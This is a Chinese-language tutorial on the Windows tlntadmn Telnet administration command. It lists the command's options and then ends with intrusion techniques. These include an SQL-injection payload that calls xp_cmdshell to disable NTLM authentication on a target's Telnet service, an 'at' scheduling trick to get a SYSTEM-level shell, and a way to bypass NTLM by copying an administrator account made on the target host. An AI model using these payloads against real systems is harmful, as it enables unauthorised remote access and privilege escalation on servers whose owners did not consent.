telnet可以帮助我们完成远程的登录设置,那么管理员如何对端口认证等系统进行管理呢?这里我们就来介绍一下tlntadmn命令的用法。这个命令可以帮助我们完成telnet服务的这些设置。那么,tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有会话用 'all'.
- -s sessionid 列出会话的信息.
- -k sessionid 终止会话.
- -m sessionid 发送消息到会话.
- config 配置Telnet服务器参数.
- common_options 为:
- -u user 指定要使用其凭据的用户
- -p password 用户密码
- config_options 为:
- dom = domain 设定用户的默认域
- ctrlakeymap = yes|no 设定 ALT 键的映射
- timeout = hh:mm:ss 设定空闲会话超时值 timeoutactive = yes|no 启用空闲会话.
- maxfail = attempts 设定断开前失败的登录企图数.
- maxconn = connections 设定最大连接数.
- port = number 设定Telnet端口.
- sec = [+/-]NTLM [+/-]passwd 设定身份验证机构
- fname = file 指定审计文件名.
- fsize = size 指定审计文件的最大尺寸(MB).
- mode = console|stream 指定操作模式.
- auditlocation = eventlog|file|both 指定记录地点
- audit = [+/-]user [+/-]fail [+/-]admin 指定审计的事件
使用的办法:
直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--运行以后就去掉了ntlm认证.
- C:\>tlntadmn config sec = -ntlm -----------------使用admin权限
- C:\>at 20:43 /interactive "cmd" -----------at命令启用system权限
- 新加了一项作业,其作业 ID = 1
- C:\WINNT\system32>tlntadmn config sec = -ntlm
去除NTML验证的另一个方法:在目标主机上建立好一个管理员用户!在本机建立一个和目标主机上相同的帐号密码的用户,在本机CMD上右击选择运行方式~ 输入该帐号和密码,直接Telnet服务的目标IP, 既可直接饶过NTML验证.
